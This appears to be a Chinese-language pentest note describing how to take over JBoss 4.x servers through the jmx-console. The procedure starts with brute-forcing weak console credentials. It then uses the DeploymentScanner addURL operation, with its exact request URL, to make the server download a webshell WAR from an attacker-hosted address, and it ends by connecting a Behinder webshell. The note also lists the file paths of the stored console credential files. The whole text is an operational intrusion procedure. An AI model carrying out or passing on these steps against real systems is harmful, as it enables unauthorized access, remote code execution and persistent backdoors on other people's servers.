Jboss 4.x版本jmx-console控制台弱口令getshell

总结:

1.发现jboss4.0，尝试弱口令，成功
2.直接访问ip/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL
3.void addurl中的Param Value中插入公网部署好的war包
4.返回第二步，并点击apply changes
5.查看jmx-console目录下如果有部署war包的名字证明上传成功
6.ip/war包名字/脚本名字 连上马子

---

Jboss4.0版本界面

Jboss/jmx console登录进行抓包发现也是和tomcat一样base64编码，我们可以对这个编码暴力破解从而达到弱口令进入控制台
tomcat弱口令部署war包https://blog.csdn.net/weixin_41598660/article/details/107443373

其中JMX Console和JBoss Web Consoles是相同账号密码，但是JMX Console功能点会偏多

如果得到弱口令进入jmx console后点击jboss.deployment以下链接

然后在void addURL()选项来远程加载war包来部署。

War包是由shell.jsp生成的（这里很关键，因为会影响webshell的路径）

然后把war包放到公网上映射出来，如 http://ip:端口/aufeng.war, 然后在下面的功能点void add url中的Param vule中帖上war包公网的地址，然后点击invoke

就会有如下的页面，但不能确定是上传成功的

所以要回到之前回到flavor=URL,type=DeploymentScanner页面点击下属性列表中的"Apply change"
同用url地址

http://ip:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL

然后等待的时间是有点长的，我当时是等了20分钟左右。在jmx-console目录下的deployment中的war包中如果能看到才能证明是上传成功

Webshell的地址是war包的名字+生成war包webshell的名字
成功连上冰歇马

---

jboss控制台用户密码（jmx-console）的路径
/jboss/jboss4/server/default/deploy/management/console-mgr.sar/web-console.war/WEB-INF/classes#

/opt/jboss/jboss4/server/default/conf/props/jmx-console-users.properties